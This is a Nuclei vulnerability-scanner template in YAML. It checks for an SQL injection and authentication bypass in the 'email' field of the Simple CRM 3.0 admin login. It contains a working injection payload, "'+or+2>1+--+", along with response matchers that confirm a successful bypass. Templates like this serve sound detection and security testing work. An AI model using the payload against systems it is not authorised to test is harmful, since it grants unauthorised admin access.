nuclei-templates/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml

31 lines
681 B
YAML

id: simple-crm-sql-injection
info:
name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass
author: geeknik
severity: high
reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
tags: sqli,simplecrm,auth-bypass,injection
requests:
- method: POST
path:
- "{{BaseURL}}/scrm/crm/admin"
body: "email='+or+2>1+--+&password=&login="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>window.location.href='home.php'</script>"
part: body
- type: word
words:
- "text/html"
part: header